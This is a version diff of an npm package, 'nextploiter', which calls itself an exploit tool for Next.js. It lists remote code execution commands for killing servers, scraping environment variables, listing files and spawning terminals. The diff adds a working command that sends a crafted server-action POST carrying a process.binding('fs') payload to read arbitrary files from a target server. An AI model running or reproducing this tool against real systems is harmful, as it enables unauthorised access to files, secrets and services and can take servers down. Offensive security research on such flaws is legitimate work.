nextploiter 0.0.0 → 1.0.0

package/README.md

@@ -20,7 +20,7 @@ $ npm install -g nextploiter
 $ nextploiter COMMAND
 running command...
 $ nextploiter (--version)
-nextploiter/0.0.0 darwin-arm64 node-v24.12.0
+nextploiter/1.0.0 darwin-arm64 node-v24.12.0
 $ nextploiter --help [COMMAND]
 USAGE
   $ nextploiter COMMAND
@@ -45,6 +45,7 @@ USAGE
 * [`nextploiter rce kill-server`](#nextploiter-rce-kill-server)
 * [`nextploiter rce list-env`](#nextploiter-rce-list-env)
 * [`nextploiter rce list-files`](#nextploiter-rce-list-files)
+* [`nextploiter rce process-access-files`](#nextploiter-rce-process-access-files)
 * [`nextploiter rce spawn-terminal`](#nextploiter-rce-spawn-terminal)
 
 ## `nextploiter help [COMMAND]`
@@ -369,7 +370,7 @@ DESCRIPTION
   Used for running javascript code at the remote server.
 ```
 
-_See code: [src/commands/rce/index.ts](https://github.com/vonuyvicoo/nextploiter/blob/v0.0.0/src/commands/rce/index.ts)_
+_See code: [src/commands/rce/index.ts](https://github.com/vonuyvicoo/nextploiter/blob/v1.0.0/src/commands/rce/index.ts)_
 
 ## `nextploiter rce access-files`
 
@@ -386,7 +387,7 @@ DESCRIPTION
   Helper to list return files in the server. May not work for serverless systems.
 ```
 
-_See code: [src/commands/rce/access-files.ts](https://github.com/vonuyvicoo/nextploiter/blob/v0.0.0/src/commands/rce/access-files.ts)_
+_See code: [src/commands/rce/access-files.ts](https://github.com/vonuyvicoo/nextploiter/blob/v1.0.0/src/commands/rce/access-files.ts)_
 
 ## `nextploiter rce kill-server`
 
@@ -403,7 +404,7 @@ DESCRIPTION
   Helper that uses process.exit to shutdown remote server.
 ```
 
-_See code: [src/commands/rce/kill-server.ts](https://github.com/vonuyvicoo/nextploiter/blob/v0.0.0/src/commands/rce/kill-server.ts)_
+_See code: [src/commands/rce/kill-server.ts](https://github.com/vonuyvicoo/nextploiter/blob/v1.0.0/src/commands/rce/kill-server.ts)_
 
 ## `nextploiter rce list-env`
 
@@ -420,7 +421,7 @@ DESCRIPTION
   Helper that iterates through process.env to scrape all environment variables.
 ```
 
-_See code: [src/commands/rce/list-env.ts](https://github.com/vonuyvicoo/nextploiter/blob/v0.0.0/src/commands/rce/list-env.ts)_
+_See code: [src/commands/rce/list-env.ts](https://github.com/vonuyvicoo/nextploiter/blob/v1.0.0/src/commands/rce/list-env.ts)_
 
 ## `nextploiter rce list-files`
 
@@ -438,7 +439,25 @@ DESCRIPTION
   Helper to list all files in the server. May not work for serverless systems.
 ```
 
-_See code: [src/commands/rce/list-files.ts](https://github.com/vonuyvicoo/nextploiter/blob/v0.0.0/src/commands/rce/list-files.ts)_
+_See code: [src/commands/rce/list-files.ts](https://github.com/vonuyvicoo/nextploiter/blob/v1.0.0/src/commands/rce/list-files.ts)_
+
+## `nextploiter rce process-access-files`
+
+Helper to access files using the exposed Node process and utilizes process.binding, may depend on Node version.
+
+```
+USAGE
+  $ nextploiter rce process-access-files --baseURL <value> --path <value>
+
+FLAGS
+  --baseURL=<value>  (required)
+  --path=<value>     (required)
+
+DESCRIPTION
+  Helper to access files using the exposed Node process and utilizes process.binding, may depend on Node version.
+```
+
+_See code: [src/commands/rce/process-access-files.ts](https://github.com/vonuyvicoo/nextploiter/blob/v1.0.0/src/commands/rce/process-access-files.ts)_
 
 ## `nextploiter rce spawn-terminal`
 
@@ -455,5 +474,5 @@ DESCRIPTION
   Helper that spawns a terminal.
 ```
 
-_See code: [src/commands/rce/spawn-terminal.ts](https://github.com/vonuyvicoo/nextploiter/blob/v0.0.0/src/commands/rce/spawn-terminal.ts)_
+_See code: [src/commands/rce/spawn-terminal.ts](https://github.com/vonuyvicoo/nextploiter/blob/v1.0.0/src/commands/rce/spawn-terminal.ts)_
 <!-- commandsstop -->

package/dist/_shared/helpers/processAPI.js

@@ -0,0 +1 @@
+"use strict";

package/dist/commands/rce/access-files.d.ts

@@ -1,4 +1,5 @@
 import { NextploiterCommand } from "../../base/nextploiter-command";
+/** This is not implemented yet, maybe later? **/
 export default class AccessFiles extends NextploiterCommand {
     static description: string;
     static flags: {

package/dist/commands/rce/access-files.js

@@ -9,6 +9,7 @@ const form_data_1 = __importDefault(require("form-data"));
 const node_fetch_1 = __importDefault(require("node-fetch"));
 const digestParser_1 = require("../../_shared/helpers/digestParser");
 const nextploiter_command_1 = require("../../base/nextploiter-command");
+/** This is not implemented yet, maybe later? **/
 class AccessFiles extends nextploiter_command_1.NextploiterCommand {
     static description = "Helper to list return files in the server. May not work for serverless systems.";
     static flags = {

package/dist/commands/rce/process-access-files.d.ts

@@ -0,0 +1,11 @@
+import { NextploiterCommand } from "../../base/nextploiter-command";
+import { CommandError } from "@oclif/core/lib/interfaces";
+export default class ProcessAccessFiles extends NextploiterCommand {
+    static description: string;
+    static flags: {
+        baseURL: import("@oclif/core/lib/interfaces").OptionFlag<string, import("@oclif/core/lib/interfaces").CustomOptions>;
+        path: import("@oclif/core/lib/interfaces").OptionFlag<string, import("@oclif/core/lib/interfaces").CustomOptions>;
+    };
+    run(): Promise<void>;
+    catch(err: CommandError): Promise<void>;
+}

package/dist/commands/rce/process-access-files.js

@@ -0,0 +1,54 @@
+"use strict";
+var __importDefault = (this && this.__importDefault) || function (mod) {
+    return (mod && mod.__esModule) ? mod : { "default": mod };
+};
+Object.defineProperty(exports, "__esModule", { value: true });
+const core_1 = require("@oclif/core");
+const payloads_1 = require("../../payloads");
+const form_data_1 = __importDefault(require("form-data"));
+const node_fetch_1 = __importDefault(require("node-fetch"));
+const nextploiter_command_1 = require("../../base/nextploiter-command");
+const digestParser_1 = require("../../_shared/helpers/digestParser");
+class ProcessAccessFiles extends nextploiter_command_1.NextploiterCommand {
+    static description = "Helper to access files using the exposed Node process and utilizes process.binding, may depend on Node version.";
+    static flags = {
+        baseURL: core_1.Flags.string({
+            required: true
+        }),
+        path: core_1.Flags.string({
+            required: true
+        })
+    };
+    async run() {
+        const { flags } = await this.parse(ProcessAccessFiles);
+        const payload = (0, payloads_1.payloadBuilder)(`const fsBinding = process.binding('fs'); const { O_RDONLY } = process.binding('constants').fs; const fd = fsBinding.open('${flags.path}', O_RDONLY, 0o666); const buf = Buffer.alloc(1024); const bytes = fsBinding.read(fd, buf, 0, buf.length, 0); fsBinding.close(fd); const res = buf.slice(0, bytes).toString()`);
+        const fd = new form_data_1.default();
+        this.log("Sending payload: ", payload);
+        for (const key in payload) {
+            fd.append(key, JSON.stringify(payload[key]));
+        }
+        const response = await (0, node_fetch_1.default)(flags.baseURL, {
+            method: "POST",
+            headers: {
+                'next-action': 'x',
+                ...fd.getHeaders()
+            },
+            body: fd.getBuffer(),
+        });
+        if (!response.ok) {
+            this.log(response.statusText);
+        }
+        const responseText = await response.text();
+        const parsedDigest = (0, digestParser_1.parseFlightDigest)(responseText);
+        this.log("Response: ", parsedDigest);
+    }
+    async catch(err) {
+        if (err.message.includes("socket hang up")) {
+            this.log("Server shut down successfully.");
+        }
+        else {
+            this.error(err);
+        }
+    }
+}
+exports.default = ProcessAccessFiles;

package/oclif.manifest.json

@@ -141,6 +141,41 @@
         "list-files.js"
       ]
     },
+    "rce:process-access-files": {
+      "aliases": [],
+      "args": {},
+      "description": "Helper to access files using the exposed Node process and utilizes process.binding, may depend on Node version.",
+      "flags": {
+        "baseURL": {
+          "name": "baseURL",
+          "required": true,
+          "hasDynamicHelp": false,
+          "multiple": false,
+          "type": "option"
+        },
+        "path": {
+          "name": "path",
+          "required": true,
+          "hasDynamicHelp": false,
+          "multiple": false,
+          "type": "option"
+        }
+      },
+      "hasDynamicHelp": false,
+      "hiddenAliases": [],
+      "id": "rce:process-access-files",
+      "pluginAlias": "nextploiter",
+      "pluginName": "nextploiter",
+      "pluginType": "core",
+      "strict": true,
+      "isESM": false,
+      "relativePath": [
+        "dist",
+        "commands",
+        "rce",
+        "process-access-files.js"
+      ]
+    },
     "rce:spawn-terminal": {
       "aliases": [],
       "args": {},
@@ -170,5 +205,5 @@
       ]
     }
   },
-  "version": "0.0.0"
+  "version": "1.0.0"
 }

package/package.json

@@ -1,7 +1,7 @@
 {
   "name": "nextploiter",
   "description": "Exploit tool for NextJS. Contribute at github. https://github.com/vonuyvicoo/nextploiter",
-  "version": "0.0.0",
+  "version": "1.0.0",
   "author": "Von Uyvico",
   "bin": {
     "nextploiter": "./bin/run.js"